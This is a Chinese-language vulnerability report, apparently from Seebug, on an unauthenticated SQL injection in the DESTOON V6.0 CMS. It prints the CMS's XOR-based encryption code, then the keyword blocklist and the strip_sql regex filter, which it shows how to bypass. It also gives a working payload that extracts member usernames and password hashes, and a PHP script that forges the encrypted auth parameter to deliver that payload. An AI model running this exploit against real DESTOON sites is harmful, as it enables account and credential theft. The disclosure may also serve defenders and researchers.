# DESTOON V6.0 (2015-09-16) 前台无需登入sql 注入一枚

2015-09-18T00:00:00
ID SSV:94502
Type seebug
Reporter Root
Modified 2015-09-18T00:00:00

## 1 算法剖析篇

```function encrypt(\$txt, \$key = '') { \$key or \$key = DT_KEY; \$rnd = random(32); \$txt = \$txt.substr(\$key, 0, 3); \$len = strlen(\$txt); \$ctr = 0; \$str = ''; for(\$i = 0; \$i &lt; \$len; \$i++) { \$ctr = \$ctr == 32 ? 0 : \$ctr; \$str .= \$rnd[\$ctr].(\$txt[\$i] ^ \$rnd[\$ctr++]); } return str_replace(array('=', '+', '/', '0x', '0X'), array('', '-P-', '-S-', '-Z-', '-X-'), base64_encode(kecrypt(\$str, \$key))); } function decrypt(\$txt, \$key = '') { \$key or \$key = DT_KEY; \$txt = kecrypt(base64_decode(str_replace(array('-P-', '-S-', '-Z-', '-X-'), array('+', '/', '0x', '0X'), \$txt)), \$key); \$len = strlen(\$txt); \$str = ''; for(\$i = 0; \$i &lt; \$len; \$i++) { \$tmp = \$txt[\$i]; \$str .= \$txt[++\$i] ^ \$tmp; } return substr(\$str, -3) == substr(\$key, 0, 3) ? substr(\$str, 0, -3) : ''; } function kecrypt(\$txt, \$key) { \$key = md5(\$key); \$len = strlen(\$txt); \$ctr = 0; \$str = ''; for(\$i = 0; \$i &lt; \$len; \$i++) { \$ctr = \$ctr == 32 ? 0 : \$ctr; \$str .= \$txt[\$i] ^ \$key[\$ctr++]; } return \$str; }```

`return substr(\$str, -3) == substr(\$key, 0, 3) ? substr(\$str, 0, -3) : '';`

(由于数学公式不好打 所以上传图片了- -)

`(2x+6)%32=(2y+6)%32.`

## 2 waf绕过

```&lt;?php \$_SERVER['REQUEST_URI'] = ''; require '../common.inc.php'; header("Content-type:text/javascript"); check_referer() or exit('document.write("&lt;h2&gt;Invalid Referer&lt;/h2&gt;");'); \$tag = isset(\$auth) ? strip_sql(decrypt(\$auth)) : ''; \$tag or exit('document.write("&lt;h2&gt;Bad Parameter&lt;/h2&gt;");'); foreach(array(\$DT_PRE, '#', '\$', '%', '&amp;', 'table', 'fields', 'password', 'payword', 'debug') as \$v) { strpos(\$tag, \$v) === false or exit('document.write("&lt;h2&gt;Bad Parameter&lt;/h2&gt;");'); } ob_start(); tag(\$tag); \$data = ob_get_contents(); ob_clean(); echo 'document.write(\''.dwrite(\$data ? \$data : 'No Data or Bad Parameter').'\');'; ?&gt;```

```function tag(\$parameter, \$expires = 0) { .....//省去无意义代码 parse_str(\$parameter, \$par); if(!is_array(\$par)) return ''; \$par = dstripslashes(\$par); extract(\$par, EXTR_SKIP); ...... \$order = \$order ? ' ORDER BY '.\$order : ''; ....... \$query = "SELECT ".\$fields." FROM ".\$table." WHERE ".\$condition.\$order." LIMIT ".\$offset.",".\$pagesize;```

```foreach(array(\$DT_PRE, '#', '\$', '%', '&amp;', 'table', 'fields', 'password', 'payword', 'debug') as \$v) { strpos(\$tag, \$v) === false or exit('document.write("&lt;h2&gt;Bad Parameter&lt;/h2&gt;");');```

```function strip_sql(\$string, \$type = 1) { \$match = array("/union/i","/where/i","/outfile/i","/dumpfile/i","/0x([a-f0-9]{2,})/i","/select([\s\S]*?)from/i","/select([\s\*\/\-\(\+@])/i","/update([\s\*\/\-\(\+@])/i","/replace([\s\*\/\-\(\+@])/i","/delete([\s\*\/\-\(\+@])/i","/drop([\s\*\/\-\(\+@])/i","/load_file[\s]*\(/i","/substring[\s]*\(/i","/substr[\s]*\(/i","/left[\s]*\(/i","/concat[\s]*\(/i","/concat_ws[\s]*\(/i","/make_set[\s]*\(/i","/ascii[\s]*\(/i","/hex[\s]*\(/i","/ord[\s]*\(/i","/char[\s]*\(/i"); \$replace = array('unio&#110;','wher&#101;','outfil&#101;','dumpfil&#101;','0&#120;\\1','selec&#116;\\1from','selec&#116;\\1','updat&#101;\\1','replac&#101;\\1','delet&#101;\\1','dro&#112;\\1','load_fil&#101;(','substrin&#103;(','subst&#114;(','lef&#116;(','conca&#116;(','concat_w&#115;(','make_se&#116;(','asci&#105;(','he&#120;(','or&#100;(','cha&#114;('); if(\$type) { return is_array(\$string) ? array_map('strip_sql', \$string) : preg_replace(\$match, \$replace, \$string); } else { return str_replace(array('&#100;', '&#101;', '&#103;', '&#105;', '&#110;','&#112;', '&#114;', '&#115;', '&#116;', '&#120;'), array('d', 'e', 'g', 'i', 'n', 'p', 'r', 's', 't', 'x'), \$string); } }```

`pagesize="!"))}from DESTOON_MEMBER order by userid limit 1)),1)&offset=1,1 procedure analyse(extractvalue(rand(),(select{x(insert(insert(PASSWORD,1,0,username),1,0&moduleid=2&condition=userid=1`

```&lt;?php function cracked(\$Expressly,\$Ciphertext,\$str){ \$Ciphertext=str_replace(array('-P-', '-S-', '-Z-', '-X-'),array('+', '/', '0x', '0X'),\$Ciphertext); \$Ciphertext = base64_decode(\$Ciphertext); \$c=strlen(\$Ciphertext); \$text2="a"; \$j=0; \$s=0; for(\$i=0;\$i&lt;strlen(\$str);\$i++,\$s++){ if(\$j==32){\$j=0;\$s=0;} \$tmp=\$Ciphertext[\$j]^\$Ciphertext[\$j+1]; \$tmp=\$tmp^\$Expressly[\$s]; \$tmp=\$tmp^\$str[\$i]; \$text1=\$tmp^\$text2; \$xxoo =\$xxoo.\$text2.\$text1; \$j=\$j+2; } for(\$i=5;\$i&gt;=1;\$i=\$i-2){ \$tmp=\$Ciphertext[\$c-\$i]^\$Ciphertext[\$c-\$i-1]^'a'; \$xxoo = \$xxoo.'a'.\$tmp; } echo str_replace(array('+', '/', '0x', '0X'),array('-P-', '-S-', '-Z-', '-X-'),base64_encode(\$xxoo)); } cracked("1111111111@qq.com","f018SggzVGUtHlo6J0ZaOg5rekJ6bnUGdQBgF1FhKURALgJiClMrTg",'pagesize="!"))}from DESTOON_MEMBER order by userid limit 1)),1)&offset=1,1 procedure analyse(extractvalue(rand(),(select{x(insert(insert(PASSWORD,1,0,username),1,0&moduleid=2&condition=userid=1'); ?&gt;```